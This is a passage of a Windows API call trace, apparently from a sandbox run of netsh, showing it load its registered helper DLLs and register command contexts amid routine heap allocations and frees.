dwFlags=0x0, lpMem=0x517320 | out: hHeap=0x4f0000) returned 1 [0102.346] LoadLibraryW (lpLibFileName="NAPMONTR.DLL") returned 0x71210000 [0107.056] GetProcAddress (hModule=0x71210000, lpProcName="InitHelperDll") returned 0x7121c7d5 [0107.056] InitHelperDll () returned 0x0 [0107.056] RegisterHelper () returned 0x0 [0107.056] GetProcessHeap () returned 0x4f0000 [0107.056] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x948) returned 0x51e590 [0107.056] GetProcessHeap () returned 0x4f0000 [0107.056] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x51d488 | out: hHeap=0x4f0000) returned 1 [0107.056] RegisterHelper () returned 0x0 [0107.056] GetProcessHeap () returned 0x4f0000 [0107.056] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x990) returned 0x51eee0 [0107.057] GetProcessHeap () returned 0x4f0000 [0107.057] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x51e590 | out: hHeap=0x4f0000) returned 1 [0107.057] RegisterHelper () returned 0x0 [0107.057] GetProcessHeap () returned 0x4f0000 [0107.057] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x9d8) returned 0x51f878 [0107.057] GetProcessHeap () returned 0x4f0000 [0107.057] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x51eee0 | out: hHeap=0x4f0000) returned 1 [0107.057] RegEnumValueW (in: hKey=0xac, dwIndex=0xe, lpValueName=0x5071d0, lpcchValueName=0x247a98, lpReserved=0x0, lpType=0x0, lpData=0x5071f0, lpcbData=0x247a9c | out: lpValueName="nshipsec", lpcchValueName=0x247a98, lpType=0x0, lpData=0x5071f0, lpcbData=0x247a9c) returned 0x0 [0107.057] _wcsicmp (_String1="nshipsec.dll", _String2="ipxmontr.dll") returned 5 [0107.057] _wcsicmp (_String1="nshipsec.dll", _String2="ipxpromn.dll") returned 5 [0107.057] GetProcessHeap () returned 0x4f0000 [0107.057] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x140) returned 0x51c4f0 [0107.057] GetProcessHeap () returned 0x4f0000 [0107.057] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x12) returned 0x5130c8 [0107.057] GetProcessHeap () returned 0x4f0000 [0107.058] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x1a) returned 0x51de48 [0107.058] _wcsupr (in: _String="nshipsec.dll" | out: _String="NSHIPSEC.DLL") returned="NSHIPSEC.DLL" [0107.058] GetProcessHeap () returned 0x4f0000 [0107.058] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x517440 | out: hHeap=0x4f0000) returned 1 [0107.058] LoadLibraryW (lpLibFileName="NSHIPSEC.DLL") returned 0x71cb0000 [0108.963] GetProcAddress (hModule=0x71cb0000, lpProcName="InitHelperDll") returned 0x71cb6910 [0108.963] InitHelperDll () returned 0x0 [0108.963] RegisterHelper () returned 0x0 [0108.963] GetProcessHeap () returned 0x4f0000 [0108.963] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xa20) returned 0x522258 [0108.963] GetProcessHeap () returned 0x4f0000 [0108.964] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x51f878 | out: hHeap=0x4f0000) returned 1 [0108.964] RegisterHelper () returned 0x0 [0108.964] GetProcessHeap () returned 0x4f0000 [0108.964] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xa68) returned 0x51f590 [0108.964] GetProcessHeap () returned 0x4f0000 [0108.964] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x522258 | out: hHeap=0x4f0000) returned 1 [0108.964] RegisterHelper () returned 0x0 [0108.964] GetProcessHeap () returned 0x4f0000 [0108.964] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xab0) returned 0x522258 [0108.964] GetProcessHeap () returned 0x4f0000 [0108.964] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x51f590 | out: hHeap=0x4f0000) returned 1 [0108.988] RegEnumValueW (in: hKey=0xac, dwIndex=0xf, lpValueName=0x5071d0, lpcchValueName=0x247a98, lpReserved=0x0, lpType=0x0, lpData=0x5071f0, lpcbData=0x247a9c | out: lpValueName="p2pnetsh", lpcchValueName=0x247a98, lpType=0x0, lpData=0x5071f0, lpcbData=0x247a9c) returned 0x0 [0108.988] _wcsicmp (_String1="p2pnetsh.dll", _String2="ipxmontr.dll") returned 7 [0108.988] _wcsicmp (_String1="p2pnetsh.dll", _String2="ipxpromn.dll") returned 7 [0108.988] GetProcessHeap () returned 0x4f0000 [0108.988] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x154) returned 0x51d958 [0108.988] GetProcessHeap () returned 0x4f0000 [0108.988] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x12) returned 0x51f668 [0108.988] GetProcessHeap () returned 0x4f0000 [0108.988] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x1a) returned 0x5230b8 [0108.988] _wcsupr (in: _String="p2pnetsh.dll" | out: _String="P2PNETSH.DLL") returned="P2PNETSH.DLL" [0108.989] GetProcessHeap () returned 0x4f0000 [0108.989] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x51c4f0 | out: hHeap=0x4f0000) returned 1 [0108.989] LoadLibraryW (lpLibFileName="P2PNETSH.DLL") returned 0x71c80000 [0110.141] GetProcAddress (hModule=0x71c80000, lpProcName="InitHelperDll") returned 0x71c838e5 [0110.141] InitHelperDll () returned 0x0 [0110.141] RegisterHelper () returned 0x0 [0110.141] GetProcessHeap () returned 0x4f0000 [0110.141] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xaf8) returned 0x52a1f0 [0110.141] GetProcessHeap () returned 0x4f0000 [0110.141] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x522258 | out: hHeap=0x4f0000) returned 1 [0110.141] RegisterHelper () returned 0x0 [0110.141] GetProcessHeap () returned 0x4f0000 [0110.141] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xb40) returned 0x52acf0 [0110.141] GetProcessHeap () returned 0x4f0000 [0110.141] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x52a1f0 | out: hHeap=0x4f0000) returned 1 [0110.141] RegisterHelper () returned 0x0 [0110.141] GetProcessHeap () returned 0x4f0000 [0110.141] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xb88) returned 0x52b838 [0110.142] GetProcessHeap () returned 0x4f0000 [0110.142] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x52acf0 | out: hHeap=0x4f0000) returned 1 [0110.142] RegisterHelper () returned 0x0 [0110.142] GetProcessHeap () returned 0x4f0000 [0110.142] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xbd0) returned 0x52c3c8 [0110.142] GetProcessHeap () returned 0x4f0000 [0110.142] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x52b838 | out: hHeap=0x4f0000) returned 1 [0110.142] RegisterHelper () returned 0x0 [0110.142] GetProcessHeap () returned 0x4f0000 [0110.142] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc18) returned 0x52a1f0 [0110.142] GetProcessHeap () returned 0x4f0000 [0110.142] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x52c3c8 | out: hHeap=0x4f0000) returned 1 [0110.142] RegisterHelper () returned 0x0 [0110.142] GetProcessHeap () returned 0x4f0000 [0110.142] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc60) returned 0x52ae10 [0110.142] GetProcessHeap () returned 0x4f0000 [0110.142] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x52a1f0 | out: hHeap=0x4f0000) returned 1 [0110.142] RegisterHelper () returned 0x0 [0110.142] GetProcessHeap () returned 0x4f0000 [0110.142] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xca8) returned 0x52ba78 [0110.142] GetProcessHeap () returned 0x4f0000 [0110.142] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x52ae10 | out: hHeap=0x4f0000) returned 1 [0110.143] RegisterHelper () returned 0x0 [0110.143] GetProcessHeap () returned 0x4f0000 [0110.143] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xcf0) returned 0x52a1f0 [0110.143] GetProcessHeap () returned 0x4f0000 [0110.143] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x52ba78 | out: hHeap=0x4f0000) returned 1 [0110.143] RegisterHelper () returned 0x0 [0110.143] GetProcessHeap () returned 0x4f0000 [0110.143] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xd38) returned 0x52aee8 [0110.143] GetProcessHeap () returned 0x4f0000 [0110.143] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x52a1f0 | out: hHeap=0x4f0000) returned 1 [0110.143] RegisterHelper () returned 0x0 [0110.143] GetProcessHeap () returned 0x4f0000 [0110.143] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xd80) returned 0x52bc28 [0110.143] GetProcessHeap () returned 0x4f0000 [0110.143] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x52aee8 | out: hHeap=0x4f0000) returned 1 [0110.143] RegEnumValueW (in: hKey=0xac, dwIndex=0x10, lpValueName=0x5071d0, lpcchValueName=0x247a98, lpReserved=0x0, lpType=0x0, lpData=0x5071f0, lpcbData=0x247a9c | out: lpValueName="wlancfg", lpcchValueName=0x247a98, lpType=0x0, lpData=0x5071f0, lpcbData=0x247a9c) returned 0x0 [0110.143] _wcsicmp (_String1="wlancfg.dll", _String2="ipxmontr.dll") returned 14 [0110.143] _wcsicmp (_String1="wlancfg.dll", _String2="ipxpromn.dll") returned 14 [0110.143] GetProcessHeap () returned 0x4f0000 [0110.143] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x168) returned 0x5257c8 [0110.143] GetProcessHeap () returned 0x4f0000 [0110.143] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x10) returned 0x520150 [0110.143] GetProcessHeap () returned 0x4f0000 [0110.143] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x18) returned 0x51f688 [0110.143] _wcsupr (in: _String="wlancfg.dll" | out: _String="WLANCFG.DLL") returned="WLANCFG.DLL" [0110.143] GetProcessHeap () returned 0x4f0000 [0110.144] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x51d958 | out: hHeap=0x4f0000) returned 1 [0110.144] LoadLibraryW (lpLibFileName="WLANCFG.DLL") returned 0x741b0000 [0111.072] GetProcAddress (hModule=0x741b0000, lpProcName="InitHelperDll") returned 0x741bc7d8 [0111.072] InitHelperDll () returned 0x0 [0111.072] RegisterHelper () returned 0x0 [0111.072] GetProcessHeap () returned 0x4f0000 [0111.072] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xdc8) returned 0x52a1f0 [0111.072] GetProcessHeap () returned 0x4f0000 [0111.072] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x52bc28 | out: hHeap=0x4f0000) returned 1 [0111.072] RegEnumValueW (in: hKey=0xac, dwIndex=0x11, lpValueName=0x5071d0, lpcchValueName=0x247a98, lpReserved=0x0, lpType=0x0, lpData=0x5071f0, lpcbData=0x247a9c | out: lpValueName="peerdistsh", lpcchValueName=0x247a98, lpType=0x0, lpData=0x5071f0, lpcbData=0x247a9c) returned 0x0 [0111.073] _wcsicmp (_String1="peerdistsh.dll", _String2="ipxmontr.dll") returned 7 [0111.073] _wcsicmp (_String1="peerdistsh.dll", _String2="ipxpromn.dll") returned 7 [0111.073] GetProcessHeap () returned 0x4f0000 [0111.073] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x17c) returned 0x51d958 [0111.073] GetProcessHeap () returned 0x4f0000 [0111.073] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x16) returned 0x51f6a8 [0111.073] GetProcessHeap () returned 0x4f0000 [0111.073] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x1e) returned 0x529e68 [0111.073] _wcsupr (in: _String="peerdistsh.dll" | out: _String="PEERDISTSH.DLL") returned="PEERDISTSH.DLL" [0111.073] GetProcessHeap () returned 0x4f0000 [0111.073] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5257c8 | out: hHeap=0x4f0000) returned 1 [0111.073] LoadLibraryW (lpLibFileName="PEERDISTSH.DLL") returned 0x70b10000 [0111.378] GetProcAddress (hModule=0x70b10000, lpProcName="InitHelperDll") returned 0x70b8c796 [0111.378] InitHelperDll () returned 0x0 [0111.379] RegisterHelper () returned 0x0 [0111.379] GetProcessHeap () returned 0x4f0000 [0111.379] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xe10) returned 0x52afc0 [0111.379] GetProcessHeap () returned 0x4f0000 [0111.379] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x52a1f0 | out: hHeap=0x4f0000) returned 1 [0111.379] RegisterHelper () returned 0x0 [0111.379] GetProcessHeap () returned 0x4f0000 [0111.379] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xe58) returned 0x52edb0 [0111.379] GetProcessHeap () returned 0x4f0000 [0111.379] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x52afc0 | out: hHeap=0x4f0000) returned 1 [0111.379] RegCloseKey (hKey=0xac) returned 0x0 [0111.379] GetProcessHeap () returned 0x4f0000 [0111.379] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5071d0 | out: hHeap=0x4f0000) returned 1 [0111.379] GetProcessHeap () returned 0x4f0000 [0111.379] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5071f0 | out: hHeap=0x4f0000) returned 1 [0111.382] GetProcessHeap () returned 0x4f0000 [0111.382] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x48) returned 0x525b48 [0111.382] GetProcessHeap () returned 0x4f0000 [0111.382] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x4f0000) returned 1 [0111.382] RegisterContext () returned 0x0 [0111.385] GetProcessHeap () returned 0x4f0000 [0111.385] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x48) returned 0x525b98 [0111.385] GetProcessHeap () returned 0x4f0000 [0111.385] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x4f0000) returned 1 [0125.398] RegisterContext () returned 0x0 [0125.399] GetProcessHeap () returned 0x4f0000 [0125.399] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x48) returned 0x525be8 [0125.399] GetProcessHeap () returned 0x4f0000 [0125.399] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x4f0000) returned 1 [0125.399] RegisterContext () returned 0x0 [0125.400] _wcsicmp (_String1="ipv6", _String2="ip") returned 118 [0125.400] _wcsicmp (_String1="ipv6", _String2="ip") returned 118 [0125.400] GetProcessHeap () returned 0x4f0000 [0125.400] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x90) returned 0x51dcf0 [0125.400] GetProcessHeap () returned 0x4f0000 [0125.400] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x525be8 | out: hHeap=0x4f0000) returned 1 [0126.559] RegisterContext () returned 0x0 [0126.561] _wcsicmp (_String1="aaaa", _String2="ip") returned -8 [0126.561] _wcsicmp (_String1="aaaa", _String2="ipv6") returned -8 [0126.561] _wcsicmp (_String1="aaaa", _String2="ip") returned -8 [0126.561] GetProcessHeap () returned 0x4f0000 [0126.561] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xd8) returned 0x5258f0 [0126.561] GetProcessHeap () returned 0x4f0000 [0126.561] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x51dcf0 | out: hHeap=0x4f0000) returned 1 [0126.561] RegisterContext () returned 0x0 [0126.562] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x120) returned 0x5339c8 [0126.562] GetProcessHeap () returned 0x4f0000 [0126.562] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5258f0 | out: hHeap=0x4f0000) returned 1 [0126.562] RegisterContext () returned 0x0 [0126.562] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x90) returned 0x51dcf0 [0126.562] GetProcessHeap () returned 0x4f0000 [0126.562] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x525b98 | out: hHeap=0x4f0000) returned 1 [0126.562] RegisterContext () returned 0x0 [0126.562] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xd8) returned 0x5258f0 [0126.562] GetProcessHeap () returned 0x4f0000 [0126.563] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x51dcf0 | out: hHeap=0x4f0000) returned 1 [0126.563] RegisterContext () returned 0x0 [0126.563] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x120) returned 0x533c68 [0126.563] GetProcessHeap () returned 0x4f0000 [0126.563] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5258f0 | out: hHeap=0x4f0000) returned 1 [0126.563] RegisterContext () returned 0x0 [0126.563] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x168) returned 0x533d90 [0126.563] GetProcessHeap () returned 0x4f0000 [0126.563] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x533c68 | out: hHeap=0x4f0000) returned 1 [0127.349] RegisterContext () returned 0x0 [0127.349] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x1b0) returned 0x52af78 [0127.350] GetProcessHeap () returned 0x4f0000 [0127.350] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x533d90 | out: hHeap=0x4f0000) returned 1 [0127.350] RegisterContext () returned 0x0 [0127.350] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x1f8) returned 0x533c68 [0127.350] GetProcessHeap () returned 0x4f0000 [0127.350] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x52af78 | out: hHeap=0x4f0000) returned 1 [0127.350] RegisterContext () returned 0x0 [0127.350] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x48) returned 0x525b98 [0127.350] GetProcessHeap () returned 0x4f0000 [0127.350] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x4f0000) returned 1 [0127.350] RegisterContext () returned 0x0 [0127.350] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x90) returned 0x51dcf0 [0127.350] GetProcessHeap () returned 0x4f0000 [0127.350] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x525b98 | out: hHeap=0x4f0000) returned 1 [0127.350] RegisterContext () returned 0x0 [0127.350] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xd8) returned 0x5258f0 [0127.351] GetProcessHeap () returned 0x4f0000 [0127.351] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x51dcf0 | out: hHeap=0x4f0000) returned 1 [0127.351] RegisterContext () returned 0x0 [0127.351] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x120) returned 0x533e68 [0127.351] GetProcessHeap () returned 0x4f0000 [0127.351] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5258f0 | out: hHeap=0x4f0000) returned 1 [0127.351] RegisterContext () returned 0x0 [0127.351] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x240) returned 0x52af78 [0127.351] GetProcessHeap () returned 0x4f0000 [0127.351] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x533c68 | out: hHeap=0x4f0000) returned 1 [0127.351] RegisterContext () returned 0x0 [0127.351] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x288) returned 0x52b1c0 [0127.351] GetProcessHeap () returned 0x4f0000 [0127.351] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x52af78 | out: hHeap=0x4f0000) returned 1 [0127.351] RegisterContext () returned 0x0 [0127.351] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x2d0) returned 0x52b450 [0127.351] GetProcessHeap () returned 0x4f0000 [0127.351] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x52b1c0 | out: hHeap=0x4f0000) returned 1 [0127.351] RegisterContext () returned 0x0 [0127.351] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x318) returned 0x52af78 [0127.352] GetProcessHeap () returned 0x4f0000 [0127.352] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x52b450 | out: hHeap=0x4f0000) returned 1 [0127.352] RegisterContext () returned 0x0 [0127.352] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x48) returned 0x525b98 [0127.352] GetProcessHeap () returned 0x4f0000 [0127.352] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x4f0000) returned 1 [0127.352] RegisterContext () returned 0x0 [0127.352] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x90) returned 0x51dcf0 [0127.352] GetProcessHeap () returned 0x4f0000 [0127.352] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x525b98 | out: hHeap=0x4f0000) returned 1 [0127.352] RegisterContext () returned 0x0 [0127.352] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xd8) returned 0x5258f0 [0127.352] GetProcessHeap () returned 0x4f0000 [0127.352] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x51dcf0 | out: hHeap=0x4f0000) returned 1 [0127.352] RegisterContext () returned 0x0 [0127.352] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x120) returned 0x533c68 [0127.352] GetProcessHeap () returned 0x4f0000 [0127.352] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5258f0 | out: hHeap=0x4f0000) returned 1 [0127.352] RegisterContext () returned 0x0 [0127.352] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x168) returned 0x52b298 [0127.352] GetProcessHeap () returned 0x4f0000 [0127.352] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x533c68 | out: hHeap=0x4f0000) returned 1 [0127.353] RegisterContext () returned 0x0 [0127.353] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x1b0) returned 0x533c68 [0127.353] GetProcessHeap () returned 0x4f0000 [0127.353] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x52b298 | out: hHeap=0x4f0000) returned 1 [0127.353] RegisterContext () returned 0x0 [0127.353] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x48) returned 0x525b98 [0127.353] GetProcessHeap () returned 0x4f0000 [0127.353] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x4f0000) returned 1 [0127.353] RegisterContext () returned 0x0 [0127.353] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x90) returned 0x51dcf0 [0127.353] GetProcessHeap () returned 0x4f0000 [0127.353] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x525b98 | out: hHeap=0x4f0000) returned 1 [0127.353] RegisterContext () returned 0x0 [0127.353] RegisterContext () returned 0x0 [0127.353] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x1f8) returned 0x52b298 [0127.354] GetProcessHeap () returned 0x4f0000 [0127.354] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x533c68 | out: hHeap=0x4f0000) returned 1 [0127.354] RegisterContext () returned 0x0 [0127.354] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x240) returned 0x52b498 [0127.354] GetProcessHeap () returned 0x4f0000 [0127.354] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x52b298 | out: hHeap=0x4f0000) returned 1 [0127.354] RegisterContext () returned 0x0 [0127.354] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x360) returned 0x52b6e0 [0127.354] GetProcessHeap () returned 0x4f0000 [0127.354] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x52af78 | out: hHeap=0x4f0000) returned 1 [0127.354] RegisterContext () returned 0x0 [0127.354] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x3a8) returned 0x52af78 [0127.354] GetProcessHeap () returned 0x4f0000 [0127.354] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x52b6e0 | out: hHeap=0x4f0000) returned 1 [0127.354] RegisterContext () returned 0x0 [0127.354] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x3f0) returned 0x52b6e0 [0127.354] GetProcessHeap () returned 0x4f0000 [0127.355] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x52af78 | out: hHeap=0x4f0000) returned 1 [0127.355] RegisterContext () returned 0x0 [0127.355] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x48) returned 0x525b98 [0127.355] GetProcessHeap () returned 0x4f0000 [0127.355] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x4f0000) returned 1 [0127.355] RegisterContext () returned 0x0 [0127.355] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x438) returned 0x52af78 [0127.355] GetProcessHeap () returned 0x4f0000 [0127.355] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x52b6e0 | out: hHeap=0x4f0000) returned 1 [0127.370] RegisterContext () returned 0x0 [0127.370] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x480) returned 0x539700 [0127.370] GetProcessHeap () returned 0x4f0000 [0127.370] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x52af78 | out: hHeap=0x4f0000) returned 1 [0130.192] RegisterContext () returned 0x0 [0130.192] GetProcessHeap () returned 0x4f0000 [0130.192] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x4f0000) returned 1 [0130.202] RegisterContext () returned 0x0 [0130.202] GetProcessHeap () returned 0x4f0000 [0130.202] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x526098 | out: hHeap=0x4f0000) returned 1 [0130.202] RegisterContext () returned 0x0 [0130.202] GetProcessHeap () returned 0x4f0000 [0130.202] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x539700 | out: hHeap=0x4f0000) returned 1 [0130.202] RegisterContext () returned 0x0 [0130.202] GetProcessHeap () returned 0x4f0000 [0130.202] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x4f0000) returned 1 [0130.202] RegisterContext () returned 0x0 [0130.202] GetProcessHeap () returned 0x4f0000 [0130.202] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x526098 | out: hHeap=0x4f0000) returned 1 [0130.202] RegisterContext () returned 0x0 [0130.202] RegisterContext () returned 0x0 [0130.203] RegisterContext () returned 0x0 [0130.203] GetProcessHeap () returned 0x4f0000 [0130.203] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x54b7e8 | out: hHeap=0x4f0000) returned 1 [0130.203] RegisterContext () returned 0x0 [0130.203] GetProcessHeap () returned 0x4f0000 [0130.203] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x4f0000) returned 1 [0130.810] RegisterContext () returned 0x0 [0130.811] GetProcessHeap () returned 0x4f0000 [0130.811] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x526098 | out: hHeap=0x4f0000) returned 1 [0130.811] RegisterContext () returned 0x0 [0130.811] GetProcessHeap () returned 0x4f0000 [0130.811] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x539700 | out: hHeap=0x4f0000) returned 1 [0130.811] RegisterContext () returned 0x0 [0130.811] GetProcessHeap () returned 0x4f0000 [0130.811] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x539798 | out: hHeap=0x4f0000) returned 1 [0130.811] RegisterContext () returned 0x0 [0130.811] GetProcessHeap () returned 0x4f0000 [0130.811] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x4f0000) returned 1 [0130.811] RegisterContext () returned 0x0 [0130.811] GetProcessHeap () returned 0x4f0000 [0130.811] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x526098 | out: hHeap=0x4f0000) returned 1 [0130.811] RegisterContext () returned 0x0 [0130.811] GetProcessHeap () returned 0x4f0000 [0130.811] HeapFree (in: 